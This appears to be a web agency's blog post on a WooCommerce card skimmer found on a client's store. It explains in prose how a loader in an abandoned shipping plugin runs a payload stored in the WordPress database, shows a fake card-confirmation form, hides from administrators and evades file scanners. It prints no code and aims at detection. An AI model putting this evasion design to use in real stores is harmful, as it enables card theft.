Samson Web Design Samson Web Design Helping customers online since 2006
Call 01903 368559 Free site health check
Blog · Site Security & Vulnerabilities ·

The Hidden WooCommerce Card Skimmer That Sails Straight Past Your Security Scanner

If you run a WooCommerce store, here's a scenario that should make you sit up: a customer completes their order, payment goes through, and then, on the "thank you" page, they're shown a box asking them to type in their card number, expiry date and CVC again to "confirm" the order. If they do, they get charged a second time, a duplicate order is created, and their full card details are quietly sent to a criminal on the other side of the world.

We recently found exactly this on a client's store. What made it genuinely alarming wasn't the skimmer itself, it was how well it was hidden. The site was running a reputable security plugin, scans were coming back clean, and the malicious code had been sitting there, silently harvesting card details, for more than two years.

Here's how it works, how you can spot it, and why your security scanner never said a word.

How you discover it as a store owner

This particular infection is sneaky because, for the most part, your store works perfectly normally. Orders come in, payments are taken, everything looks healthy in your dashboard. The giveaway only appears at one specific moment, and often only to your customers, not to you.

These are the tell-tale signs:

  1. A card-details box on the order-complete / "thank you" page. After checkout has already succeeded, the customer sees a form titled something like "Confirm Order Number: 44897" with fields for Card Number, MM/YY and CVC, and a Confirm button.
  2. Duplicate orders and double charges. Customers who fill in that "confirmation" box get charged a second time and a duplicate order appears.
  3. It happens regardless of payment method. Card, Apple Pay, PayPal, the fake box shows up after the order completes either way.
  4. You, the admin, might never see it. This is the clever part: the malicious code is written to hide itself from administrators. When you place a test order while logged in, everything can look fine, which is exactly why these infections run for so long before anyone realises.
  5. Your security scanner reports nothing. Clean scan, green ticks, no alerts.

In our client's case, the owner only found out because a customer reported being asked for their card twice. A test order from a logged-out phone confirmed it instantly.

The culprit: an abandoned shipping plugin

The infection was anchored in a plugin called WooCommerce Advanced Shipping.

It's worth being clear: this isn't because the plugin is malicious, it's because it's abandoned. The plugin hasn't been maintained for years and has been pulled from the official WordPress plugin directory. Abandoned plugins are a favourite target for attackers precisely because nobody is shipping security updates for them anymore, and store owners rarely notice they've gone stale. Once an attacker finds a way in, an old, forgotten plugin file is a perfect, low-traffic place to hide.

The lesson here applies far beyond this one plugin: every unmaintained plugin on your site is an open door waiting to be used.

Worried about this attack being on your site?

If you'd like us to check your WooCommerce store, get in touch and we'll take a look.

How the attack actually works

What makes this skimmer so effective is that it's built in two separate pieces, and that split is the whole reason it evades detection.

Piece one: the loader (hidden in a plugin file). A few lines of code were quietly inserted into the shipping plugin. They do nothing on a normal page. But the moment a visitor lands on the order-received page, the code wakes up, reaches into the website's database, pulls out a chunk of stored instructions, and runs them.

Piece two: the payload (hidden in the database). The actual skimmer, the part that draws the fake card form and steals the details, wasn't stored in a file at all. It was tucked away inside an old, unused corner of the WordPress database: the "Links" (Blogroll) feature, a relic from the early days of WordPress that almost no modern store uses. Because it's empty and forgotten on virtually every site, it's the perfect hiding spot.

When the two pieces combine on the thank-you page, the payload:

  1. Reads the real order details (order number, name, address, email, phone).
  2. Draws a convincing "Confirm Order Number" form styled to look like a legitimate part of your checkout.
  3. Pre-fills hidden fields with the customer's genuine order data, so what they're submitting looks authentic.
  4. Captures the card number, expiry and CVC the customer types in.
  5. Sends all of it to a server controlled by the attacker, and, because the data has already left your site, charges the customer again in the process.

And, as mentioned, it deliberately skips all of this when an administrator is viewing the page.

Why your security scanner missed it completely

This is the part every store owner needs to understand, because it's a dangerous and widespread blind spot.

Most security plugins scan your files. They do not scan the contents of your database.

The attackers know this. By keeping the dangerous payload, the skimmer itself, out of the files and inside the database, they sidestep the scanner entirely. The only thing left in the files was a tiny, innocent-looking snippet that, on its own, doesn't obviously do anything wrong. There was simply nothing for a file scanner to flag.

That's how a live, working card skimmer can hum along on a busy store for years while every scan comes back clean. A green tick from your security plugin tells you your files look okay. It tells you nothing about what's hiding in your database.

Why this matters so much

This isn't a cosmetic bug or a minor nuisance. For the entire time it's active, an infection like this means:

Your customers' card numbers and CVCs are being stolen, transaction after transaction.

Customers are being charged twice, creating refunds, chargebacks and angry emails.

Your store is the source of a card-data breach, which carries real legal and PCI compliance obligations, and serious damage to your reputation and your relationship with your payment provider.

The longer it runs undetected, the bigger the exposure. Two-plus years, in our client's case.

Worried your store might be affected?

If any of the warning signs above sound familiar, a card box appearing after checkout, reports of double charges, or you've simply never had a proper, database-level security review, it's worth getting checked. And remember: a clean scan from your existing security plugin does not rule this out.

At Samson Web Design, we've dealt with this exact infection from end to end. We know where it hides, how to confirm whether your store is affected, how to remove it cleanly, and, just as importantly, how to find out how the attackers got in and shut that door so it can't happen again.

If you'd like us to check your WooCommerce store, get in touch and we'll take a look. It's far cheaper to find this now than to discover it after your customers, or your card processor, find it for you.


Keep reading

25 Jun 2026
Choosing the Right Website Builder: A Practical Guide for UK Small Business Owners
24 Jun 2026
How to Spot Google Ads Agency Scams Before They Catch You Out
22 Jun 2026
Linking Google Business Profile to Google Analytics: Local Lead Tracking Made Simple

Not sure where your site stands?

Get a free, plain-English health check. Speed, security, backups, errors and updates, all checked in minutes. No signup, no sales call, no obligation.

Get a free health check 01903 368559
Free site health check Contact us